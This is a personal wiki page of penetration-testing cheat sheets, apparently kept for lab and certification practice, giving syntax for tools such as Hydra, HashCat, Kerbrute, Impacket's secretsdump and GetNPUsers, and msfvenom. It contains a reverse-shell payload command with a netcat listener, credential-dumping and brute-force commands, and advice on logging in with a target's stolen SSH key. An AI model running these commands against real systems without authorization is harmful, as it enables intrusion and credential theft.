The gMan nixWiki

Because the mind is made of Teflon...



Various Tools & Their Syntax

Apache

Start a simple web server in Kali:

service apache2 start
# default landing dir: /var/www/html

# To stop/kill the server: 
service apache2 stop

# To check Apache status: 
service apache2 status

Place files you want to transfer to the target machine in the /var/www/html/ directory. Then, from the target machine, fetch them over HTTP (browser, wget, certutil, etc.) and download the files.


certutil

In Windows, use certutil from the CLI to download files (like wget in Linux):

certutil -urlcache -f http://[target ip]/filename.exe filename.exe

With the -f option, -urlcache forces fetching a specific URL and updating the cache.

Resource: documentation


curl

Download the home/index page from a site:

curl http://[target ip]

Upload a file using PUT:

curl http://[target ip]/[subdir] --upload-file gk_put.txt           # or:
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"

Note: -X PUT is redundant when using -T (which is short for --upload-file)


dig

The DNS (Domain Name System) maps domain names to IP addresses.

When you plug a domain name in your browser URI box…

  1. Local cache is checked first for a valid mapping to an IP. TTL (measured in seconds) defines the length of time a mapping in cache is considered valid. If not found…
  2. Your router sends the request to a recursive DNS server (usually your ISP or OpenDNS, etc.). If not found…
  3. The recursive server passes the request to a root name server. Root name servers (13 unique IP addresses for them) keep track of the DNS servers in the next level down: top-level domain servers.
  4. Top-Level Domain (TLD) Servers are split up by extensions (.com, .org, .co.uk, etc.). TLD servers keep track of DNS servers one level down: authoritative name servers.
  5. Authoritative name servers are used to store DNS records for domains directly (the buck stops here). The IP mapped to the domain name you requested is sent back to you and your browser uses it to access the website you want to go to.

This whole process is automagic with browsers but dig can do all this manually (and show us the results).

Syntax:

dig [domain] @[dns-server-ip]

# Example:
dig google.com @1.1.1.1

GoBuster

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. Here we focus on using it to brute-force directories.

You need a wordlist. In Kali: /usr/share/wordlists

Run GoBuster with a wordlist:

gobuster dir -u http://[ip]:[port] -w [/path/to/wordlist/file]

Flags:

Flag                Description
-e                  Print the full URLs in your console
-u                  The target URL
-w                  Path to your wordlist
-U and -P           Username and Password for Basic Auth
-p <x>              Proxy to use for requests
-c <http cookies>   Specify a cookie for simulating your auth

grep

grep for a “string” in all the files from root (/) or whatever directory you want:

grep -rnw / -e "admin@syntex.com" 2>/dev/null
grep -rnw /usr/share/ -e "admin@syntex.com" 2>/dev/null

Options:

  • -r : recursive; read all files under each directory, recursively
  • -n : number; Prefix each line of output with the 1-based line number within its input file.
  • -w : whole words; select only those lines containing matches that form whole words
  • -e [pattern] : expression; search for all patterns given; can be used to protect a pattern beginning with “-”

2>/dev/null sends STDERR to the abyss instead of to the screen.


HashCat

A password recovery tool…

Example Syntax:

Three of the most important options are:

  • -m Mode: the hash type, from the table in the help file
  • -a Attack-Mode: from a smaller table in the help file
  • -o Output file (so you don't have to do a --show later)

hashcat -m 18200 -a 0 -o cracked.txt hash.txt passwordlist.txt
# -m  mode for Kerberos 5, etype 23, AS-REP
# -a  straight (i.e., dictionary) attack mode; default attack mode
# -o  output file name cracked.txt

If you forget to put in the -o for an output file, you'll need to use the same command you used to crack the password and add --show to it.

HashCat Wiki for help: here.


Hydra

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more.

Syntax: To find the password for an ftp account when you know the username…

hydra -t 4 -l [user] -P [/path/to/dictionary] -vV [machine IP] [ftp | ssh | etc]
#
# -t 4                     Number of parallel connections per target
# -l [user]                The login/username of the account we are trying to compromise
# -P [/path/to/dictionary] The file containing the list of possible passwords
#                          Example: /usr/share/wordlists/rockyou.txt
# -vV                      Very verbose: login+pass combo for each attempt
# [machine IP]             The IP address of the target machine
# [ftp | ssh | etc]        Sets the protocol

Kerberos

Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more secure than NTLM by using third party ticket authorization and stronger encryption.

Attack                 Privilege Requirements
Kerbrute Enumeration   No domain access required
Pass the Ticket        Access as a user to the domain required
Kerberoasting          Access as any user required
AS-REP Roasting        Access as any user required
Golden Ticket          Full domain compromise (domain admin) required
Silver Ticket          Service hash required
Skeleton Key           Full domain compromise (domain admin) required

Kerbrute

Kerbrute is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

  • Download the binary for your machine.
  • chmod 777 [binary name] to make it executable (chmod +x is enough; 777 also makes the file world-writable).

Commands:

# to get the general help screen:
./kerbrute

# to get the help screen for a specific command: 
./kerbrute [command name] -h

# specific help example:
./kerbrute userenum -h

# to enumerate AD usernames:
./kerbrute userenum --dc [target IP] -d [domain] userlist.txt 

# enumerate AD usernames example: 
./kerbrute userenum --dc 10.10.215.44 -d THM-AD userlist.txt | tee output.txt

# Brute force user accounts from a domain controller using a supplied wordlist:
./kerbrute userenum --dc [IP Address] -d CONTROLLER.local user_wordlist.txt

Here are some usage examples.

Impacket

Found in Kali here: /usr/share/doc/python3-impacket/examples

GetNPUsers.py

Impacket’s GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user’s password, which can then be cracked offline.

# mine from TryHackMe Attacktive Directory, #1
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request -outputfile GetNPUsers_output.txt -format hashcat -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# mine from TryHackMe Attacktive Directory, #2
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# from wadcoms (above)
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt

secretsdump.py

Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from the registry, dumping NTLM hashes, plaintext credentials, and Kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques. [ Source. ]

Command:

python3 secretsdump.py test.local/john:password123@10.10.10.1

Some how-to stuff on interpreting the output: here.

Example:

#            |-- colon separated values               
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# |-- username |                     |                          |
#              |-- RID (Relative ID) |                          |
#                                    |-- LM (LAN Manager) Hash  |
#                                        Old & Deprecated       |
#                                                               |-- NTLM Hash (for
#                                                                   Pass-the-Hash)
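An added example (not from this page or from Impacket) that parses lines in the colon-separated format shown above and flags what a defender reviewing such a dump cares about: accounts with the empty-password NT hash, accounts that still store a real LM hash, and NT-hash reuse across accounts (i.e., the same password). The sample dump is constructed; its non-empty hashes are made-up hex.

```python
import re
from collections import defaultdict

# Well-known hashes of an empty password (both appear in the dump line above).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One record per line: user:RID:LM hash:NT hash:::  (status lines are skipped)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample dump; the non-empty hashes are made-up hex, not real credentials.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
jdoe:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy01:1106:112233445566778899aabbccddeeff00:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""


def parse_dump(text):
    """Return (user, rid, lm, nt) tuples for every hash line in a secretsdump dump."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return records


def triage(records):
    """Flag empty passwords, accounts still storing a real LM hash, and NT-hash reuse."""
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_password": []}
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in records:
        if nt == EMPTY_NT:  # blank password, usually a disabled built-in account
            findings["empty_password"].append(user)
        if lm != EMPTY_LM:  # LM storage should be off; a real LM hash is trivially crackable
            findings["lm_hash_stored"].append(user)
        by_nt[nt].append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:  # same NT hash == same password
            findings["shared_password"].append(sorted(users))
    return findings
```

Run `triage(parse_dump(open("secretsdump_output.txt").read()))` on a real dump to get the three lists; NTDS.dit lines with a DOMAIN\user prefix parse the same way.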

msfvenom

Reverse Shell Payload

To generate a reverse shell payload:

msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R
# 
# -p    = payload
# lhost = our local host IP address (this is your machine's IP address)
# lport = the port to listen on (this is the port on your machine)
# R     = export the payload in raw format

After that, set up a listener on your attack machine:

nc -nvvlp [listening port]

Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.


Notes

To-Do: https://www.reddit.com/r/oscp/comments/ixmqp0/msfvenom/

Source: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/

Advice: I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom.

Additional:


ping

Ping Multiple IPs – One-Liners…

Windows:

FOR /L %i IN (1,1,254) DO ping -n 1 192.168.0.%i | FIND /i "Reply"

How it works:

  • FOR /L %i IN (1, 1, 254) : Create a loop from 1 to 254, the range of valid host IPs in a 192.168.0.0/24 network.
  • DO ping -n 1 192.168.0.%i : Follow the FOR loop with the ping command to execute on each iteration (-n 1 sends a single echo request).
  • | FIND /i "Reply" : filter to display only replies (kinda hinky, might need to tweak this a bit)

Redirect output to a file with: > filename.txt

Linux:

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; done

How it works:

  • for ip in $(seq 1 254); : create a loop from one to 254.
  • do ping -c 1 192.168.1.$ip; done : ping the IP address, substituting the loop variable for the last part of the address, and then end the statement.

Redirect output to a file with: > filename.txt

Source: https://smallbusiness.chron.com/ping-ip-addresses-lan-68381.html


SSH

Syntax

ssh [user_name]@[host]  # host can be either IP or domain name
# OR
ssh -i [key-file] [user_name]@[host]

The default Key Name is id_rsa.

  • The private key: ~/.ssh/id_rsa
  • The public key: ~/.ssh/id_rsa.pub

Note: You need to chmod 600 id_rsa in order for the file to be usable in a session.

If you can obtain the id_rsa file of a target, just put it in your ~/.ssh directory and ssh into the target machine. Or reference the key file with the -i switch if you put it in another directory somewhere.

Copy via SSH

Syntax:

scp [source] [destination]

Examples:

To copy a file from B to A while logged into B:

scp /path/to/file username@a:/path/to/destination
#   [source]      [destination]           

To copy a file from B to A while logged into A:

scp username@b:/path/to/file /path/to/destination
#   [source]                 [destination]

tcpdump

Listener: To listen to an interface on my local machine and see if a ping from inside a target machine is getting out (i.e., do we have the ability to execute system commands?)…

tcpdump ip proto \\icmp -i [interface name: eth0, tun0, etc.]
# The double backslash is needed when typing this into a shell: the shell strips one,
# and tcpdump needs "\icmp" to read icmp as a protocol name rather than a keyword.

cheat_sheets_various.1707013101.txt.gz · Last modified: by gman